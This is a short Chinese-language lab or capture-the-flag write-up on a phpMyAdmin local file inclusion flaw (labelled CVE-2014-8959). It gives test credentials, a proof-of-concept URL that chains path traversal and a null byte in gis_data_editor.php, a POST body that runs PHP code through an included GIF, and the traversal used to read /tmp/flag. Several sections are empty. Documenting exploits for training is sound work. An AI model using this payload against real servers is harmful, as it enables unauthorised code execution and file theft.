【文件包含】phpmyadmin 文件包含（CVE-2014-8959）

1.1漏洞描述

描述: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码，包含根目录下1.gif，其内容为：  

1.2漏洞等级

高危

1.3影响版本

phpMyAdmin

1.4漏洞复现

1.4.1.基础环境

1.4.2.前提

• 网站后台地址：/pma

• 后台管理账密：pmatest/pmatest 

1.5深度利用

1.5.1 漏洞点

POC：

http://ip:port/pma/gis_data_editor.php?token=4320dfa8b951d131f1a71891bbb2edbd&&gis_data[gis_type]=/../../../../1.gif%00

（使用自己拦截到的token）

post提交：

a=phpinfo();

查看/tmp/flag

/../../../../../../../../../../tmp/flag%00

拿到flag

flag-{bmh73c07be5-156d-47eb-ab2d-9a3e93cc53f4}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

• 升级

• 打补丁

• 上设备